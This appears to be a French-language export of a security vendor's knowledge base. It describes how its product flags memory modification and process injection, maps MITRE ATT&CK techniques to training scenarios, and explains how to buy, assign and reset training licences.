<div id="bkmrk-cyber-crucible-indic"><div class="aui-page-panel"><div class="view"><div class="wiki-content group"><figure style="text-align:center;margin:1em auto;">![Cyber Crucible Indicates Responses with Modified Memory](https://knowledgebase.cybercrucible.com/attachments/159)<figcaption style="font-style:italic;font-size:0.9em;margin-top:0.4em;color:#666;">Cyber Crucible indique les réponses avec mémoire modifiée</figcaption></figure></div></div></div></div>La mémoire modifiée est plus difficile et plus éphémère à localiser que d'autres méthodes d'injection de processus. Au lieu de cela, nous fournissons une valeur booléenne rapide permettant de voir que la modification a eu lieu, et à partir de là, l'analyse des diffs réels de la mémoire nécessite une investigation plus approfondie.

<div id="bkmrk-some-raw-memory-disa"><div class="aui-page-panel"><div class="view"><div class="wiki-content group"><figure style="float:left;width:340px;margin:0 1em 1em 0;text-align:center;">![Some raw memory](https://knowledgebase.cybercrucible.com/attachments/160)<figcaption style="font-style:italic;font-size:0.9em;margin-top:0.4em;color:#666;">Mémoire brute</figcaption></figure><figure style="float:right;width:340px;margin:0 0 1em 1em;text-align:center;">![Disassembled memory](https://knowledgebase.cybercrucible.com/attachments/163)<figcaption style="font-style:italic;font-size:0.9em;margin-top:0.4em;color:#666;">Mémoire désassemblée</figcaption></figure></div></div></div></div>La collecte de la mémoire n'est que la première étape ; même après désassemblage, le code peut être très obfusqué et difficile à lire. La bonne nouvelle est que nous disposons de beaucoup d'éléments pour cette analyse lorsque nous avons la mémoire d'origine, les métadonnées associées, l'exécutable d'origine et les instructions de l'exécutable modifié elles-mêmes.

1\. oui, 2.

## Exemples de scénarios :

<div id="bkmrk-training-scenario---"><div class="aui-page-panel" id="bkmrk-created-by-kyle-nehm-1"><div class="view" id="bkmrk-created-by-kyle-nehm-2"><div class="wiki-content group" id="bkmrk-what-is-memory-modif">- [Scénario de formation - Modification de la mémoire](https://knowledgebase.cybercrucible.com/books/Cyber-Crucible-Training-Info/page/Training-Scenario-Memory-Modification)

</div></div></div><div id="bkmrk--4"></div></div>

# Techniques Mitre couvertes

<div class="wiki-content group" id="bkmrk-mitre-techniquessumm"><div class="table-wrap"><table class="confluenceTable"><colgroup><col style="width:314px;"></col><col style="width:1121px;"></col><col style="width:365px;"></col></colgroup><tbody><tr><th class="confluenceTh">**Techniques Mitre**

</th><th class="confluenceTh">**Résumé**

</th><th class="confluenceTh">**Scénarios de formation**

</th></tr><tr><td class="confluenceTd">[<u>T1037</u>](https://attack.mitre.org/techniques/T1037)

</td><td class="confluenceTd">Un logiciel malveillant peut demander à Windows d'exécuter des scripts malveillants au démarrage ou lors de la connexion d'un utilisateur.

</td><td class="confluenceTd"></td></tr><tr><td class="confluenceTd">[<u>T1055</u>](https://attack.mitre.org/techniques/T1055/)

</td><td class="confluenceTd">Injection de processus, généralement utilisée pour exécuter du code malveillant dans un processus cible tout en permettant au processus d'origine de continuer.

</td><td class="confluenceTd">[Training Scenario - Process Injection](/books/Cyber-Crucible-Training-Info/page/Training-Scenario-Process-Injection)

</td></tr><tr><td class="confluenceTd">[<u>T1055-001</u>](https://attack.mitre.org/techniques/T1055/001)

</td><td class="confluenceTd">L'injection de DLL peut être utilisée pour charger du code malveillant dans un processus en demandant simplement au processus cible de charger une nouvelle DLL ou en remplaçant une DLL légitime avant son chargement.

</td><td class="confluenceTd">[Training Scenario - DLL Injection](/books/Cyber-Crucible-Training-Info/page/Training-Scenario-DLL-Injection)

</td></tr><tr><td class="confluenceTd">[<u>T1055-005</u>](https://attack.mitre.org/techniques/T1055/005/)

</td><td class="confluenceTd">Injection de processus par modification du stockage local des threads (thread local storage), incitant l'application à exécuter du code malveillant lors de la gestion des threads.

</td><td class="confluenceTd"></td></tr><tr><td class="confluenceTd">[<u>T1055-012</u>](https://attack.mitre.org/techniques/T1055/012/)

</td><td class="confluenceTd">Injection de processus par remplacement de code dans un processus, généralement avant le début de son exécution.

</td><td class="confluenceTd">[Training Scenario - Memory Modification](/books/Cyber-Crucible-Training-Info/page/Training-Scenario-Memory-Modification)

</td></tr><tr><td class="confluenceTd">[<u>T1055-013</u>](https://attack.mitre.org/techniques/T1055/013/)

</td><td class="confluenceTd">Injection de processus par exécution d'un exécutable malveillant tout en trompant le système d'exploitation et les produits de sécurité en leur faisant analyser une révision antérieure de l'exécutable.

</td><td class="confluenceTd"></td></tr><tr><td class="confluenceTd">[<u>T1059-001</u>](https://attack.mitre.org/techniques/T1059/001)

</td><td class="confluenceTd">PowerShell est souvent utilisé par les logiciels malveillants Windows pour effectuer l'installation du malware, comme le remplacement de fichiers légitimes par des fichiers malveillants.

</td><td class="confluenceTd"></td></tr><tr><td class="confluenceTd">[<u>T1068</u>](https://attack.mitre.org/techniques/T1068)

</td><td class="confluenceTd">L'élévation de privilèges via des vulnérabilités logicielles peut permettre à du code malveillant d'échapper aux restrictions de permissions ou aux environnements virtualisés.

</td><td class="confluenceTd"></td></tr><tr><td class="confluenceTd">[<u>T1091</u>](https://attack.mitre.org/techniques/T1091)

</td><td class="confluenceTd">Un logiciel malveillant peut se répliquer sur un support amovible afin que la prochaine machine sur laquelle il est connecté puisse l'exécuter via l'exécution automatique ou des vulnérabilités de pilotes.

</td><td class="confluenceTd"></td></tr><tr><td class="confluenceTd">[<u>T1106</u>](https://attack.mitre.org/techniques/T1106)

</td><td class="confluenceTd">Les API natives constituent souvent l'accès le plus direct aux fonctionnalités du système d'exploitation pour l'accès aux fichiers, l'exécution de processus, et bien plus encore.

</td><td class="confluenceTd"></td></tr><tr><td class="confluenceTd">[<u>T1204</u>](https://attack.mitre.org/techniques/T1204)

</td><td class="confluenceTd">L'exécution par l'utilisateur, souvent obtenue via le phishing, est la manière la plus simple pour un logiciel malveillant de commencer à s'exécuter.

</td><td class="confluenceTd">[Training Scenario - Vanilla Ransomware](/books/Cyber-Crucible-Training-Info/page/Training-Scenario-Vanilla-Ransomware)

</td></tr><tr><td class="confluenceTd">[<u>T1212</u>](https://attack.mitre.org/techniques/T1212)

</td><td class="confluenceTd">Des identifiants peuvent être volés en exploitant un logiciel vulnérable qui ne chiffre pas les identifiants saisis par un utilisateur.

</td><td class="confluenceTd">[Training Scenario - Identity Theft](/books/Cyber-Crucible-Training-Info/page/Training-Scenario-Identity-Theft)

[Training Scenario - Data Enumeration](/books/Cyber-Crucible-Training-Info/page/Training-Scenario-Data-Enumeration)

</td></tr><tr><td class="confluenceTd">[<u>T1543</u>](https://attack.mitre.org/techniques/T1543)

</td><td class="confluenceTd">La création ou la modification d'un processus système peut déguiser du code malveillant en un processus système normal et de confiance afin d'échapper à la détection de logiciels malveillants.

</td><td class="confluenceTd">[Training Scenario - Process Injection](/books/Cyber-Crucible-Training-Info/page/Training-Scenario-Process-Injection)

[Training Scenario - Memory Modification](/books/Cyber-Crucible-Training-Info/page/Training-Scenario-Memory-Modification)

</td></tr><tr><td class="confluenceTd">[<u>T1547</u>](https://attack.mitre.org/techniques/T1547)

</td><td class="confluenceTd">Un logiciel malveillant peut demander à Windows d'exécuter des programmes malveillants au démarrage ou lors de la connexion d'un utilisateur.

</td><td class="confluenceTd"></td></tr><tr><td class="confluenceTd">[<u>T1548</u>](https://attack.mitre.org/techniques/T1548)

</td><td class="confluenceTd">Le détournement du contrôle d'élévation peut permettre à un processus qui n'aurait normalement pas de privilèges plus élevés d'être élevé afin d'accéder à des données protégées.

</td><td class="confluenceTd"></td></tr><tr><td class="confluenceTd">[<u>T1555</u>](https://attack.mitre.org/techniques/T1555)

</td><td class="confluenceTd">Des identifiants stockés provenant de gestionnaires ou de navigateurs non chiffrés peuvent être utilisés pour accéder à des données privilégiées.

</td><td class="confluenceTd">[Training Scenario - Identity Theft](/books/Cyber-Crucible-Training-Info/page/Training-Scenario-Identity-Theft)

</td></tr><tr><td class="confluenceTd">[<u>T1559</u>](https://attack.mitre.org/techniques/T1559/)

</td><td class="confluenceTd">La communication inter-processus peut fournir un contrôle sur le processus cible à partir de l'injecteur une fois l'injection terminée.

</td><td class="confluenceTd">[Training Scenario - Process Injection](/books/Cyber-Crucible-Training-Info/page/Training-Scenario-Process-Injection)   
[Training Scenario - DLL Injection](/books/Cyber-Crucible-Training-Info/page/Training-Scenario-DLL-Injection)   
[Training Scenario - Memory Modification](/books/Cyber-Crucible-Training-Info/page/Training-Scenario-Memory-Modification)

</td></tr><tr><td class="confluenceTd">[<u>T1566</u>](https://attack.mitre.org/techniques/T1566)

</td><td class="confluenceTd">Le phishing peut être utilisé pour inciter un utilisateur à effectuer une action qu'il n'aurait pas effectuée autrement, comme exécuter un script ou partager un mot de passe.

</td><td class="confluenceTd">[Training Scenario - Vanilla Ransomware](/books/Cyber-Crucible-Training-Info/page/Training-Scenario-Vanilla-Ransomware)

</td></tr><tr><td class="confluenceTd">[<u>T1569</u>](https://attack.mitre.org/techniques/T1569)

</td><td class="confluenceTd">L'injection dans un service système tel qu'un `svchost` existant peut déguiser du code malveillant afin qu'il soit signalé comme provenant d'un processus bien connu et de confiance.

</td><td class="confluenceTd">[Training Scenario - Process Injection](/books/Cyber-Crucible-Training-Info/page/Training-Scenario-Process-Injection)

</td></tr><tr><td class="confluenceTd">[<u>T1574-002</u>](https://attack.mitre.org/techniques/T1574/002/)

</td><td class="confluenceTd">Des DLL malveillantes peuvent être forcées à se charger dans un processus par ailleurs légitime.

</td><td class="confluenceTd">[Training Scenario - DLL Injection](/books/Cyber-Crucible-Training-Info/page/Training-Scenario-DLL-Injection)

</td></tr><tr><td class="confluenceTd">[<u>T1574-007</u>](https://attack.mitre.org/techniques/T1574/007/)

</td><td class="confluenceTd">Des ressources exécutables telles que des DLL peuvent être redirigées vers des substituts malveillants en exploitant la variable d'environnement `PATH`.

</td><td class="confluenceTd">[Training Scenario - DLL Injection](/books/Cyber-Crucible-Training-Info/page/Training-Scenario-DLL-Injection)

</td></tr><tr><td class="confluenceTd">[<u>T1587-002</u>](https://attack.mitre.org/techniques/T1587/002)

</td><td class="confluenceTd">Les certificats de signature de code sont un moyen pour une autorité de certifier le code d'une application. Un logiciel malveillant peut générer un certificat qui ne provient d'aucune autorité de certification, mais qui peut induire un utilisateur en erreur en lui faisant croire qu'il est légitime.

</td><td class="confluenceTd">[Training Scenario - Signed Ransomware](/books/Cyber-Crucible-Training-Info/page/Training-Scenario-Signed-Ransomware)

</td></tr><tr><td class="confluenceTd">[<u>T1587-003</u>](https://attack.mitre.org/techniques/T1587/003)

</td><td class="confluenceTd">Les certificats SSL sont utilisés pour garantir que la transmission des données est fiable. Dans un environnement mal configuré, un logiciel malveillant peut être en mesure d'installer son propre certificat SSL pour faciliter les attaques de type man in the middle.

</td><td class="confluenceTd">[Training Scenario - Signed Ransomware](/books/Cyber-Crucible-Training-Info/page/Training-Scenario-Signed-Ransomware)

</td></tr></tbody></table>

</div></div><div id="bkmrk--4"></div>

# Injection de processus

<div class="wiki-content group" id="bkmrk-what-are-process-inj">## Qu'est-ce que l'injection de processus ?

L'injection de processus se produit lorsqu'un processus A (potentiellement malveillant) force un processus B à exécuter des instructions qui ne font pas partie de son code. L'injection de processus comprend de nombreuses techniques différentes, la plus courante consistant à créer un thread distant à l'intérieur du processus victime.

Souvent, ces nouvelles instructions sont créées parallèlement au programme original, de sorte que les opérations normales du processus victime B ne sont pas affectées. Pour cette raison, l'injection passe souvent inaperçue.

#### Tactiques Mitre pertinentes :

- [<u>Mitre T1055</u>](https://attack.mitre.org/techniques/T1055/) - Injection de processus, comme décrit ci-dessus. Utilisée pour échapper à la détection de logiciels malveillants en permettant au processus cible de continuer à fonctionner normalement tout en exécutant du code malveillant.
- [<u>Mitre T1559</u>](https://attack.mitre.org/techniques/T1559/) - La communication inter-processus peut permettre de prendre le contrôle du processus cible depuis l'injecteur une fois l'injection terminée.
- [<u>Mitre T1569</u>](https://attack.mitre.org/techniques/T1569) - Injecter dans un service système tel qu'un `svchost` existant peut déguiser le code malveillant pour qu'il soit signalé comme provenant d'un processus connu et fiable.

## Quelles sont les conséquences ?

L'injection de processus non fiables dans un processus par ailleurs fiable signifie que celui-ci n'est plus fiable. Une installation par ailleurs non corrompue d'un logiciel sécurisé, comme un serveur SQL, peut être forcée à exécuter des charges utiles malveillantes. Après la mort du processus et/ou le redémarrage du système, toute preuve de cette altération disparaîtra, car tout a été effectué purement en mémoire avec une création dynamique de threads.

## Que fait Cyber Crucible ?

Cyber Crucible surveille les injections de processus qui se produisent sur le système, et n'arrête pas l'activité sauf si des activités d'extorsion de données ou de chiffrement par rançongiciel ont commencé. Cela s'explique par le fait que certains processus du système communiquent via différentes techniques d'injection de processus, sans effectuer de comportement malveillant.

Au lieu de cela, Cyber Crucible gardera une trace des injections qui se produisent vers et depuis chaque processus sur le système, et les enregistrera en vue d'une éventuelle analyse des causes profondes ultérieure. Ainsi, nous pouvons savoir non seulement qu'un processus particulier n'est actuellement pas fiable en mémoire, mais aussi quel processus a déclenché la chaîne d'activité malveillante.

## Comment le savoir ?

<span class="confluence-embedded-file-wrapper image-left-wrapper confluence-embedded-manual-size">![31784977.png?width=510](/attachments/157)</span>Lorsqu'une réponse automatisée a le champ « untrusted remote threads » à vrai, nous savons que nous avons affaire à des injections de processus. La bonne nouvelle est que nous pouvons récupérer le pid de la réponse, et parcourir les injections de processus autour du moment de l'incident, pour trouver le coupable.

<span class="confluence-embedded-file-wrapper image-center-wrapper">![embedded-image-liupbpcx.png](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-05/embedded-image-liupbpcx.png)</span>

## Exemples de scénarios :

- [Scénario de formation - Injection de processus](/books/Cyber-Crucible-Training-Info/page/Training-Scenario-Process-Injection)

 </div><div id="bkmrk--4"></div>

# Gestion des licences de formation

<div class="wiki-content group" id="bkmrk-%2F%2A%3C%21%5Bcdata%5B%2A%2F-div.rb"><div class="toc-macro rbtoc1779133468414">- [Comment acheter des licences de formation](#bkmrk-how-to-purchase-trai)
- [Comment attribuer des licences de formation aux utilisateurs](#bkmrk-how-to-assign-traini)
- [Comment libérer des licences de formation des utilisateurs](#bkmrk-how-to-release-train)
- [Comment activer/désactiver le mode formation](#bkmrk-how-to-turn-training)
- [Comment réinitialiser mes données de formation](#bkmrk-how-do-i-reset-my-tr)

</div># Comment acheter des licences de formation

Les utilisateurs peuvent accéder à notre page Licences de formation en cliquant sur l'onglet Licences de formation sous Administration dans la barre latérale.

<span class="confluence-embedded-file-wrapper image-center-wrapper confluence-embedded-manual-size">![86867969.png?width=566](/attachments/292)</span>Une fois sur la page Licences de formation, l'icône du panier permet d'acheter des licences de formation. En cliquant sur cette icône, une fenêtre modale s'ouvrira dans laquelle vous pourrez sélectionner le groupe pour lequel vous achetez des licences de formation, ainsi que le nombre de licences que vous achetez. Vous pouvez soit cliquer sur payer maintenant, ce qui vous redirigera vers un formulaire de paiement Stripe, soit envoyer une facture.

<span class="confluence-embedded-file-wrapper image-center-wrapper confluence-embedded-manual-size">![86900737.png?width=453](/attachments/294)</span><span class="confluence-embedded-file-wrapper image-center-wrapper confluence-embedded-manual-size">![86933505.png?width=340](/attachments/295)</span># Comment attribuer des licences de formation aux utilisateurs

Les utilisateurs peuvent attribuer des licences de formation en cliquant sur le bouton Attribuer à un utilisateur sur une licence libre dans la colonne Utilisateur. En cliquant sur ce bouton, une fenêtre modale s'ouvrira dans laquelle vous pourrez sélectionner l'utilisateur auquel attribuer la licence.

<span class="confluence-embedded-file-wrapper image-center-wrapper">![embedded-image-rgfyoha0.png](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-05/embedded-image-rgfyoha0.png)</span><span class="confluence-embedded-file-wrapper image-center-wrapper confluence-embedded-manual-size">![86999049.png?width=453](/attachments/297)</span># Comment libérer des licences de formation des utilisateurs

Les utilisateurs peuvent libérer des licences de formation en sélectionnant les licences souhaitées à libérer sur la grille et en cliquant sur l'icône de la corbeille. Vous pouvez libérer plusieurs licences à la fois en sélectionnant plusieurs lignes sur la grille avant de cliquer sur l'icône de la corbeille.

<span class="confluence-embedded-file-wrapper image-center-wrapper confluence-embedded-manual-size">![86867977.png?width=680](/attachments/293)</span># Comment activer/désactiver le mode formation

Les utilisateurs peuvent activer/désactiver le mode formation en accédant à la page Paramètres du compte sous l'onglet Administration dans la barre latérale. Cliquez ensuite sur le bouton bascule pour activer ou désactiver le mode formation.

<span class="confluence-embedded-file-wrapper image-center-wrapper confluence-embedded-manual-size">![86802439.png?width=340](/attachments/291)</span># Comment réinitialiser mes données de formation

Les utilisateurs peuvent réinitialiser leurs données de formation en accédant à la page Paramètres du compte sous l'onglet Administration dans la barre latérale et en cliquant sur le bouton Réinitialiser les données de formation. En cliquant sur ce bouton, une fenêtre modale s'ouvrira dans laquelle vous pourrez sélectionner le groupe pour lequel réinitialiser les données de formation. Les données de chaque groupe de formation associé au groupe sélectionné seront réinitialisées à leur état d'origine.

<span class="confluence-embedded-file-wrapper image-center-wrapper confluence-embedded-manual-size">![87097346.png?width=340](/attachments/299)</span><span class="confluence-embedded-file-wrapper image-center-wrapper confluence-embedded-manual-size">![87162881.png?width=453](/attachments/300)</span></div><div id="bkmrk--4"></div>